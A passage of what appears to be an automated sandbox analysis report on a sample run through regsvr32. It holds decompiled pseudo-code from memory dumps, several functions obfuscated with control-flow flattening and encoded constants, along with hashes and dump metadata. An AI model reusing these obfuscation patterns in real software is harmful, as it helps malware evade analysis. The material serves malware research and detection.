				_v8 = _v8 ^ 0x4021d748;
				_v40 = 0xafe691;
				_v40 = _v40 ^ 0xefea2fdb;
				_t178 = 0x1c;
				_v40 = _v40 * 0x6b;
				_v40 = _v40 ^ 0x0227a533;
				_v56 = 0xd7a6d;
				_t41 =  &_v56; // 0xd7a6d
				_v56 =  *_t41 / _t178;
				_v56 = _v56 + 0xffffe474;
				_v56 = _v56 + 0xffffe36a;
				_v56 = _v56 ^ 0x000f7b37;
				_v60 = 0x6ca6b;
				_v60 = _v60 + 0xffffdae7;
				_v60 = _v60 >> 7;
				_v60 = _v60 | 0xcbac781c;
				_v60 = _v60 ^ 0xcbae522f;
				_v44 = 0xdf19a5;
				_v44 = _v44 ^ 0xb14a7ac9;
				_v44 = _v44 + 0x9cdb;
				_v44 = _v44 ^ 0xb1911e62;
				_v48 = 0x58507;
				_v48 = _v48 ^ 0x09def95a;
				_v48 = _v48 + 0x57a6;
				_v48 = _v48 ^ 0x09d0f7b8;
				_v64 = 0x485ca9;
				_t179 = 0x44;
				_v64 = _v64 / _t179;
				_v64 = _v64 | 0x128d571e;
				_v64 = _v64 << 0xb;
				_v64 = _v64 ^ 0x6ab49c87;
				_v68 = 0xe5c221;
				_v68 = _v68 * 0x7f;
				_v68 = _v68 | 0xaf53039f;
				_v68 = _v68 + 0xe94;
				_v68 = _v68 ^ 0xfffbef17;
				_v24 = 0x80217;
				_v24 = _v24 | 0xbc5c9305;
				_v24 = _v24 ^ 0xbc535d95;
				_v52 = 0xd8af84;
				_v52 = _v52 + 0xa9a8;
				_v52 = _v52 >> 0xd;
				_v52 = _v52 >> 3;
				_v52 = _v52 ^ 0x000e2b59;
				_v32 = 0xa8ee69;
				_v32 = _v32 ^ 0x21bd0d74;
				_v32 = _v32 + 0xffff9bde;
				_v32 = _v32 ^ 0x211b91de;
				_v36 = 0x68443b;
				_v36 = _v36 << 9;
				_v36 = _v36 | 0xed698887;
				_v36 = _v36 ^ 0xfdea73c9;
				_v12 = 0x1b5d09;
				_v12 = _v12 + 0xffff6a6f;
				_v12 = _v12 ^ 0x0019da53;
				while(_t182 != 0x673029) {
					if(_t182 == 0x6329fa7) {
						_t165 = E001C1CE8(_v40, _v20 | _v16, _t198, 0, _v56, _v60, _v44,  &_v4, _a4);
						_t202 =  &(_t202[7]);
						if(_t165 != 0) {
							_t182 = 0xa16e963;
							continue;
						}
					} else {
						if(_t182 == 0x635b1bc) {
							E001C1CE8(_v52, _v8 | _v28, _t198, _t199, _v32, _v36, _v12,  &_v4, _a4);
						} else {
							if(_t182 != 0xa16e963) {
								L10:
								if(_t182 != 0x4cdc2e3) {
									continue;
								} else {
								}
							} else {
								_push(_t182);
								_t199 = E001A303A(_t182, _v4 + _v4);
								_t202 =  &(_t202[3]);
								if(_t199 != 0) {
									_t182 = 0x635b1bc;
									continue;
								}
							}
						}
					}
					return _t199;
				}
				_t182 = 0x6329fa7;
				goto L10;
			}






























                                                                                                                0x001b7e44
                                                                                                                0x001b7e48
                                                                                                                0x001b7e4a
                                                                                                                0x001b7e4e
                                                                                                                0x001b7e4f
                                                                                                                0x001b7e50
                                                                                                                0x001b7e55
                                                                                                                0x001b7e5d
                                                                                                                0x001b7e66
                                                                                                                0x001b7e68
                                                                                                                0x001b7e6f
                                                                                                                0x001b7e74
                                                                                                                0x001b7e7a
                                                                                                                0x001b7e82
                                                                                                                0x001b7e8a
                                                                                                                0x001b7e92
                                                                                                                0x001b7e97
                                                                                                                0x001b7e9f
                                                                                                                0x001b7ea7
                                                                                                                0x001b7eac
                                                                                                                0x001b7eb4
                                                                                                                0x001b7ec0
                                                                                                                0x001b7ec5
                                                                                                                0x001b7ecb
                                                                                                                0x001b7ed3
                                                                                                                0x001b7edb
                                                                                                                0x001b7ee8
                                                                                                                0x001b7eeb
                                                                                                                0x001b7eef
                                                                                                                0x001b7ef7
                                                                                                                0x001b7eff
                                                                                                                0x001b7f07
                                                                                                                0x001b7f0b
                                                                                                                0x001b7f13
                                                                                                                0x001b7f1b
                                                                                                                0x001b7f23
                                                                                                                0x001b7f2b
                                                                                                                0x001b7f33
                                                                                                                0x001b7f38
                                                                                                                0x001b7f40
                                                                                                                0x001b7f48
                                                                                                                0x001b7f50
                                                                                                                0x001b7f58
                                                                                                                0x001b7f60
                                                                                                                0x001b7f68
                                                                                                                0x001b7f70
                                                                                                                0x001b7f78
                                                                                                                0x001b7f80
                                                                                                                0x001b7f88
                                                                                                                0x001b7f94
                                                                                                                0x001b7f97
                                                                                                                0x001b7f9b
                                                                                                                0x001b7fa3
                                                                                                                0x001b7fa8
                                                                                                                0x001b7fb0
                                                                                                                0x001b7fbd
                                                                                                                0x001b7fc1
                                                                                                                0x001b7fc9
                                                                                                                0x001b7fd1
                                                                                                                0x001b7fd9
                                                                                                                0x001b7fe1
                                                                                                                0x001b7fee
                                                                                                                0x001b7ffb
                                                                                                                0x001b8003
                                                                                                                0x001b800b
                                                                                                                0x001b8010
                                                                                                                0x001b8015
                                                                                                                0x001b801d
                                                                                                                0x001b8025
                                                                                                                0x001b802d
                                                                                                                0x001b8035
                                                                                                                0x001b803d
                                                                                                                0x001b8045
                                                                                                                0x001b804a
                                                                                                                0x001b8052
                                                                                                                0x001b805a
                                                                                                                0x001b8062
                                                                                                                0x001b806a
                                                                                                                0x001b8072
                                                                                                                0x001b807c
                                                                                                                0x001b80d9
                                                                                                                0x001b80de
                                                                                                                0x001b80e3
                                                                                                                0x001b80e5
                                                                                                                0x00000000
                                                                                                                0x001b80e5
                                                                                                                0x001b807e
                                                                                                                0x001b8080
                                                                                                                0x001b811f
                                                                                                                0x001b8082
                                                                                                                0x001b8088
                                                                                                                0x001b80ee
                                                                                                                0x001b80f4
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001b80fa
                                                                                                                0x001b808a
                                                                                                                0x001b809e
                                                                                                                0x001b80a8
                                                                                                                0x001b80aa
                                                                                                                0x001b80af
                                                                                                                0x001b80b1
                                                                                                                0x00000000
                                                                                                                0x001b80b1
                                                                                                                0x001b80af
                                                                                                                0x001b8088
                                                                                                                0x001b8080
                                                                                                                0x001b8130
                                                                                                                0x001b8130
                                                                                                                0x001b80ec
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: )0g$)0g$;Dh$mz
                                                                                                                • API String ID: 0-1774774541
                                                                                                                • Opcode ID: fba09aa33dc81b2521ad7f9275d737a16c6a115bb55e1870d6aaac202352e3ec
                                                                                                                • Instruction ID: e101898ae21d4d66bfb481f2b21dc3722a4c1b3d828a2d4e5cbde93e2d74b3cb
                                                                                                                • Opcode Fuzzy Hash: fba09aa33dc81b2521ad7f9275d737a16c6a115bb55e1870d6aaac202352e3ec
                                                                                                                • Instruction Fuzzy Hash: 837130B5508381AFD398DE61C88991FBBE5BBD4B48F409A1DF59696220C3B58A09CF43
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001B3983 Relevance: 5.2, Strings: 4, Instructions: 153COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 90%
                                                                                                                			E001B3983(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				void* _t115;
				intOrPtr _t129;
				void* _t133;
				void* _t135;
				signed int _t152;
				signed int _t153;
				signed int _t154;
				intOrPtr _t156;
				signed int* _t160;

				_t133 = __ecx;
				_push(1);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(1);
				_push(__ecx);
				E001AC98A(_t115);
				_v12 = 0x41da6b;
				_t156 = 0;
				_v8 = 0;
				_t160 =  &(( &_v64)[7]);
				_v4 = 0;
				_v64 = 0x294700;
				_t135 = 0x9ff2b4c;
				_v64 = _v64 >> 0xf;
				_t152 = 0x6e;
				_v64 = _v64 * 0x2a;
				_v64 = _v64 + 0x5a2;
				_v64 = _v64 ^ 0x000e651d;
				_v60 = 0x371836;
				_v60 = _v60 * 0x3b;
				_v60 = _v60 * 0x12;
				_v60 = _v60 / _t152;
				_v60 = _v60 ^ 0x021e3430;
				_v28 = 0x4ed677;
				_v28 = _v28 | 0x7188ef15;
				_v28 = _v28 ^ 0x71ce2d2d;
				_v32 = 0xcadbea;
				_v32 = _v32 >> 7;
				_v32 = _v32 ^ 0x0008d24b;
				_v36 = 0xf02df2;
				_v36 = _v36 + 0x566c;
				_v36 = _v36 ^ 0x00f108d9;
				_v44 = 0x63cd57;
				_v44 = _v44 | 0xe6bbd512;
				_v44 = _v44 + 0xffff0330;
				_v44 = _v44 ^ 0xe6fcaa9b;
				_v40 = 0x934bf;
				_v40 = _v40 << 4;
				_v40 = _v40 ^ 0x00958d08;
				_v48 = 0x1e0eea;
				_v48 = _v48 | 0x84c1d32c;
				_t153 = 0x43;
				_v48 = _v48 / _t153;
				_v48 = _v48 ^ 0x01f176cb;
				_v52 = 0x2602b8;
				_v52 = _v52 << 0xc;
				_v52 = _v52 | 0xcd7804e5;
				_v52 = _v52 ^ 0xed7892aa;
				_v56 = 0x734130;
				_v56 = _v56 + 0x6d5c;
				_t154 = 0x7e;
				_v56 = _v56 / _t154;
				_v56 = _v56 << 5;
				_v56 = _v56 ^ 0x001529a1;
				_v20 = 0x70e836;
				_v20 = _v20 | 0x575d0273;
				_v20 = _v20 ^ 0x57704dbf;
				_v24 = 0xa086a;
				_v24 = _v24 + 0x14e8;
				_v24 = _v24 ^ 0x000556de;
				_t155 = _v16;
				do {
					while(_t135 != 0x751618) {
						if(_t135 == 0x1cb3211) {
							_t129 = E001C131D();
							_t155 = _t129;
							if(_t129 != 0xffffffff) {
								_t135 = 0x751618;
								continue;
							}
						} else {
							if(_t135 == 0x9ff2b4c) {
								_t135 = 0x1cb3211;
								continue;
							} else {
								if(_t135 == 0xc44e196) {
									E001ACBBF(_v32, _v36, _a8, 1, _v44, 1, _t135, _v16, _v40, _v48, _v52, _t133);
									_t160 =  &(_t160[0xa]);
									_t135 = 0xdd45aa6;
									_t156 =  !=  ? 1 : _t156;
									continue;
								} else {
									if(_t135 != 0xdd45aa6) {
										goto L15;
									} else {
										E001B02D8(_v16, _v56, _v20, _v24);
									}
								}
							}
						}
						L7:
						return _t156;
					}
					if(E001BEC35(_t155, _v60, _v28,  &_v16) == 0) {
						_t135 = 0xa6a72b0;
						goto L15;
					} else {
						_t135 = 0xc44e196;
						continue;
					}
					goto L7;
					L15:
				} while (_t135 != 0xa6a72b0);
				goto L7;
			}




























                                                                                                                0x001b398c
                                                                                                                0x001b398f
                                                                                                                0x001b3990
                                                                                                                0x001b3994
                                                                                                                0x001b3998
                                                                                                                0x001b399c
                                                                                                                0x001b39a0
                                                                                                                0x001b39a1
                                                                                                                0x001b39a2
                                                                                                                0x001b39a7
                                                                                                                0x001b39af
                                                                                                                0x001b39b1
                                                                                                                0x001b39b5
                                                                                                                0x001b39b8
                                                                                                                0x001b39be
                                                                                                                0x001b39c6
                                                                                                                0x001b39cb
                                                                                                                0x001b39d7
                                                                                                                0x001b39da
                                                                                                                0x001b39de
                                                                                                                0x001b39e6
                                                                                                                0x001b39ee
                                                                                                                0x001b39fb
                                                                                                                0x001b3a04
                                                                                                                0x001b3a10
                                                                                                                0x001b3a14
                                                                                                                0x001b3a1c
                                                                                                                0x001b3a24
                                                                                                                0x001b3a2c
                                                                                                                0x001b3a34
                                                                                                                0x001b3a3c
                                                                                                                0x001b3a41
                                                                                                                0x001b3a49
                                                                                                                0x001b3a51
                                                                                                                0x001b3a59
                                                                                                                0x001b3a61
                                                                                                                0x001b3a69
                                                                                                                0x001b3a71
                                                                                                                0x001b3a79
                                                                                                                0x001b3a81
                                                                                                                0x001b3a89
                                                                                                                0x001b3a8e
                                                                                                                0x001b3a96
                                                                                                                0x001b3a9e
                                                                                                                0x001b3aaa
                                                                                                                0x001b3aaf
                                                                                                                0x001b3ab5
                                                                                                                0x001b3abd
                                                                                                                0x001b3ac5
                                                                                                                0x001b3aca
                                                                                                                0x001b3ad2
                                                                                                                0x001b3ada
                                                                                                                0x001b3ae2
                                                                                                                0x001b3aee
                                                                                                                0x001b3af1
                                                                                                                0x001b3af5
                                                                                                                0x001b3afa
                                                                                                                0x001b3b02
                                                                                                                0x001b3b0a
                                                                                                                0x001b3b12
                                                                                                                0x001b3b1a
                                                                                                                0x001b3b22
                                                                                                                0x001b3b2a
                                                                                                                0x001b3b32
                                                                                                                0x001b3b36
                                                                                                                0x001b3b36
                                                                                                                0x001b3b48
                                                                                                                0x001b3bd4
                                                                                                                0x001b3bd9
                                                                                                                0x001b3bde
                                                                                                                0x001b3be0
                                                                                                                0x00000000
                                                                                                                0x001b3be0
                                                                                                                0x001b3b4e
                                                                                                                0x001b3b54
                                                                                                                0x001b3bc6
                                                                                                                0x00000000
                                                                                                                0x001b3b56
                                                                                                                0x001b3b5c
                                                                                                                0x001b3baf
                                                                                                                0x001b3bb4
                                                                                                                0x001b3bb7
                                                                                                                0x001b3bbe
                                                                                                                0x00000000
                                                                                                                0x001b3b5e
                                                                                                                0x001b3b64
                                                                                                                0x00000000
                                                                                                                0x001b3b6a
                                                                                                                0x001b3b7a
                                                                                                                0x001b3b80
                                                                                                                0x001b3b64
                                                                                                                0x001b3b5c
                                                                                                                0x001b3b54
                                                                                                                0x001b3b82
                                                                                                                0x001b3b8a
                                                                                                                0x001b3b8a
                                                                                                                0x001b3c02
                                                                                                                0x001b3c0e
                                                                                                                0x00000000
                                                                                                                0x001b3c04
                                                                                                                0x001b3c04
                                                                                                                0x00000000
                                                                                                                0x001b3c04
                                                                                                                0x00000000
                                                                                                                0x001b3c13
                                                                                                                0x001b3c13
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 0As$6p$\m$lV
                                                                                                                • API String ID: 0-925760428
                                                                                                                • Opcode ID: dee23f884468536b0a5b5edf1e1d81506725524f780b5c5b8c18997d6d46b82b
                                                                                                                • Instruction ID: 2a510bd481f695dc61ad15f0c1951ece55fb11777a0bca8b0dd71a2aa67f53d4
                                                                                                                • Opcode Fuzzy Hash: dee23f884468536b0a5b5edf1e1d81506725524f780b5c5b8c18997d6d46b82b
                                                                                                                • Instruction Fuzzy Hash: B3615571108341AFC358CE25C98945BBFE6FFD4368F604A1DF59696260C3B5DA498F83
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1002B47F Relevance: 4.6, APIs: 3, Instructions: 54windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1002B47F(intOrPtr* __ecx, void* __eflags, long _a4) {
				long _t8;
				void* _t9;
				short _t10;
				intOrPtr _t11;
				long _t12;
				long _t18;
				intOrPtr* _t25;

				_t18 = _a4;
				_t25 = __ecx;
				if(E10017E39(__ecx, __eflags, _t18) == 0) {
					_t8 = SendMessageA( *(__ecx + 0x20), 0x476, 0, 0);
					__eflags = _t8;
					if(_t8 != 0) {
						__eflags =  *((intOrPtr*)(_t18 + 4)) - 0x100;
						if( *((intOrPtr*)(_t18 + 4)) != 0x100) {
							L11:
							_t9 = E1001839A(_t18);
							L12:
							return _t9;
						}
						_t10 = GetAsyncKeyState(0x11);
						__eflags = _t10;
						if(_t10 >= 0) {
							goto L11;
						}
						_t11 =  *((intOrPtr*)(_t18 + 8));
						__eflags = _t11 - 9;
						if(_t11 == 9) {
							L9:
							_t12 = SendMessageA( *(_t25 + 0x20), 0x475, 0, _t18);
							__eflags = _t12;
							if(_t12 == 0) {
								goto L11;
							}
							L10:
							_t9 = 1;
							goto L12;
						}
						__eflags = _t11 - 0x21;
						if(_t11 == 0x21) {
							goto L9;
						}
						__eflags = _t11 - 0x22;
						if(_t11 != 0x22) {
							goto L11;
						}
						goto L9;
					}
					 *((intOrPtr*)( *_t25 + 0x60))();
					goto L10;
				}
				return 1;
			}










                                                                                                                0x1002b480
                                                                                                                0x1002b486
                                                                                                                0x1002b48f
                                                                                                                0x1002b4a9
                                                                                                                0x1002b4ab
                                                                                                                0x1002b4ad
                                                                                                                0x1002b4b8
                                                                                                                0x1002b4bf
                                                                                                                0x1002b4f6
                                                                                                                0x1002b4f9
                                                                                                                0x1002b4fe
                                                                                                                0x00000000
                                                                                                                0x1002b4fe
                                                                                                                0x1002b4c3
                                                                                                                0x1002b4c9
                                                                                                                0x1002b4cc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002b4ce
                                                                                                                0x1002b4d1
                                                                                                                0x1002b4d4
                                                                                                                0x1002b4e0
                                                                                                                0x1002b4eb
                                                                                                                0x1002b4ed
                                                                                                                0x1002b4ef
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002b4f1
                                                                                                                0x1002b4f3
                                                                                                                0x00000000
                                                                                                                0x1002b4f3
                                                                                                                0x1002b4d6
                                                                                                                0x1002b4d9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002b4db
                                                                                                                0x1002b4de
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002b4de
                                                                                                                0x1002b4b3
                                                                                                                0x00000000
                                                                                                                0x1002b4b3
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3850602802-0
                                                                                                                • Opcode ID: cdfd7cf99aca2536526c47757dd245ea40762f0b833d22b57554424f1fedac50
                                                                                                                • Instruction ID: add0b43d62b0f5ebaa968ad4f88f68ea6391617411a4e3041e67fea6ca7b721a
                                                                                                                • Opcode Fuzzy Hash: cdfd7cf99aca2536526c47757dd245ea40762f0b833d22b57554424f1fedac50
                                                                                                                • Instruction Fuzzy Hash: 8D018471740A46A7D760FA26ACC1F2B62D8FB487C4FD14425FA45DB692DB70DC418660
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100504E2 Relevance: 4.5, APIs: 3, Instructions: 39threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 88%
                                                                                                                			E100504E2() {
				signed int _v8;
				char _v16;
				void* __esi;
				signed int _t8;
				intOrPtr* _t15;
				intOrPtr _t16;
				char _t20;
				intOrPtr _t22;
				intOrPtr _t23;
				signed int _t24;
				int _t25;
				signed int _t27;

				_t8 =  *0x1006dbdc; // 0xdf7c0cda
				_v8 = _t8 ^ _t27;
				_t24 = 0;
				if(GetLocaleInfoA(GetThreadLocale(), 0x1004,  &_v16, 7) == 0) {
					L4:
					_t25 = GetACP();
				} else {
					_t20 = _v16;
					_t15 =  &_v16;
					if(_t20 == 0) {
						goto L4;
					} else {
						do {
							_t15 = _t15 + 1;
							_t24 = _t24 * 0xa + _t20 - 0x30;
							_t20 =  *_t15;
						} while (_t20 != 0);
						if(_t24 == 0) {
							goto L4;
						}
					}
				}
				return E1003B437(_t25, _t16, _v8 ^ _t27, _t22, _t23, _t25);
			}















                                                                                                                0x100504e8
                                                                                                                0x100504ef
                                                                                                                0x100504f3
                                                                                                                0x1005050f
                                                                                                                0x10050530
                                                                                                                0x10050536
                                                                                                                0x10050511
                                                                                                                0x10050511
                                                                                                                0x10050516
                                                                                                                0x10050519
                                                                                                                0x00000000
                                                                                                                0x1005051b
                                                                                                                0x1005051b
                                                                                                                0x10050521
                                                                                                                0x10050522
                                                                                                                0x10050526
                                                                                                                0x10050528
                                                                                                                0x1005052e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1005052e
                                                                                                                0x10050519
                                                                                                                0x10050546

                                                                                                                APIs
                                                                                                                • GetThreadLocale.KERNEL32 ref: 100504F5
                                                                                                                • GetLocaleInfoA.KERNEL32(00000000,00001004,?,00000007), ref: 10050507
                                                                                                                • GetACP.KERNEL32 ref: 10050530
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Locale$InfoThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 4232894706-0
                                                                                                                • Opcode ID: df4e6de48619319cec469c3dc7a3750b232d842b0f83f7f6d72983e0651ab34c
                                                                                                                • Instruction ID: fb023d138c63cbcd0f5eb6b343bbe587d03a5afb79beba185f8be65564275fb1
                                                                                                                • Opcode Fuzzy Hash: df4e6de48619319cec469c3dc7a3750b232d842b0f83f7f6d72983e0651ab34c
                                                                                                                • Instruction Fuzzy Hash: E1F0C231E00A689BEB15DF749965AEF77E4EB08B81F41415DE981E7240EA20AD08CBC4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100175E3 Relevance: 4.5, APIs: 3, Instructions: 37COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 79%
                                                                                                                			E100175E3(struct HWND__* _a4, signed int _a8) {
				struct _WINDOWPLACEMENT _v48;
				int _t16;

				if(E100174A2() == 0) {
					if((_a8 & 0x00000003) == 0) {
						if(IsIconic(_a4) == 0) {
							_t16 = GetWindowRect(_a4,  &(_v48.rcNormalPosition));
						} else {
							_t16 = GetWindowPlacement(_a4,  &_v48);
						}
						if(_t16 == 0) {
							return 0;
						} else {
							return E10017597( &(_v48.rcNormalPosition), _a8);
						}
					}
					return 0x12340042;
				}
				return  *0x1007094c(_a4, _a8);
			}





                                                                                                                0x100175f0
                                                                                                                0x10017604
                                                                                                                0x10017618
                                                                                                                0x10017630
                                                                                                                0x1001761a
                                                                                                                0x10017621
                                                                                                                0x10017621
                                                                                                                0x10017638
                                                                                                                0x00000000
                                                                                                                0x1001763a
                                                                                                                0x00000000
                                                                                                                0x10017641
                                                                                                                0x10017638
                                                                                                                0x00000000
                                                                                                                0x10017606
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: df7d4e2dfb66cc90b1d9a218e20c7df51814343b9a35adcfa3141255191a6ac1
                                                                                                                • Instruction ID: 21e17db689f8d27aef5e8d1d2dc2d4cfa505b85111c41e41ad2976879c8eaef7
                                                                                                                • Opcode Fuzzy Hash: df7d4e2dfb66cc90b1d9a218e20c7df51814343b9a35adcfa3141255191a6ac1
                                                                                                                • Instruction Fuzzy Hash: 24F03731504919ABDF42DF69CC44AAE3BB9FB04280F008020FC1ED9060EB30DA94EB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001AE65A Relevance: 4.0, Strings: 3, Instructions: 259COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 95%
                                                                                                                			E001AE65A(signed int* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				unsigned int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				void* _t213;
				signed int _t242;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				void* _t256;
				signed int* _t285;
				signed int* _t289;
				void* _t291;

				_t286 = _a8;
				_push(_a16);
				_t285 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001AC98A(_t213);
				_v76 = 0x5b7bde;
				_v72 = 0x9e824a;
				_t289 =  &(( &_v164)[6]);
				_v68 = 0;
				_v64 = 0;
				_t256 = 0x6eaba5f;
				_v148 = 0xdab969;
				_v148 = _v148 << 6;
				_t251 = 0x17;
				_v148 = _v148 * 0x52;
				_v148 = _v148 * 0x46;
				_v148 = _v148 ^ 0x0d4f9300;
				_v136 = 0x27c2e4;
				_v136 = _v136 >> 4;
				_v136 = _v136 * 0x6b;
				_v136 = _v136 ^ 0x01037311;
				_v132 = 0xa04c98;
				_v132 = _v132 >> 0xb;
				_v132 = _v132 + 0xffff4d8d;
				_v132 = _v132 ^ 0xfff6ffa9;
				_v84 = 0xd10a51;
				_v84 = _v84 << 9;
				_v84 = _v84 ^ 0xa2153ab8;
				_v112 = 0xa98344;
				_v112 = _v112 / _t251;
				_v112 = _v112 ^ 0x0006eca6;
				_v156 = 0x3dda3;
				_v156 = _v156 + 0xffff147f;
				_v156 = _v156 + 0xffffabbe;
				_v156 = _v156 * 0x67;
				_v156 = _v156 ^ 0x0108e493;
				_v92 = 0x46f6b8;
				_v92 = _v92 ^ 0x63dca969;
				_v92 = _v92 ^ 0x63948aed;
				_v164 = 0x902182;
				_v164 = _v164 << 0x10;
				_v164 = _v164 + 0xebef;
				_v164 = _v164 | 0x5c2ac9ae;
				_v164 = _v164 ^ 0x7da23f1f;
				_v152 = 0xe266ce;
				_v152 = _v152 + 0xffff810a;
				_v152 = _v152 * 0x16;
				_v152 = _v152 | 0x56231c8f;
				_v152 = _v152 ^ 0x576a61ed;
				_v144 = 0xfc046b;
				_v144 = _v144 ^ 0x3c6a7872;
				_v144 = _v144 + 0xffff2d66;
				_v144 = _v144 * 7;
				_v144 = _v144 ^ 0xa816138e;
				_v160 = 0x34b1e2;
				_v160 = _v160 + 0xffff64d6;
				_v160 = _v160 * 0x77;
				_v160 = _v160 | 0x0dfe631e;
				_v160 = _v160 ^ 0x1dfb1317;
				_v80 = 0xaf3010;
				_v80 = _v80 << 8;
				_v80 = _v80 ^ 0xaf327599;
				_v120 = 0xfedbf9;
				_v120 = _v120 ^ 0xe704677a;
				_v120 = _v120 >> 5;
				_v120 = _v120 ^ 0x07381b6c;
				_v100 = 0xeb06c6;
				_v100 = _v100 + 0xb0e7;
				_v100 = _v100 ^ 0x00e60522;
				_v128 = 0x88ceae;
				_v128 = _v128 + 0xffff84b1;
				_v128 = _v128 ^ 0x3062550a;
				_v128 = _v128 ^ 0x30e87eef;
				_v124 = 0x8d7a77;
				_t252 = 0x11;
				_v124 = _v124 / _t252;
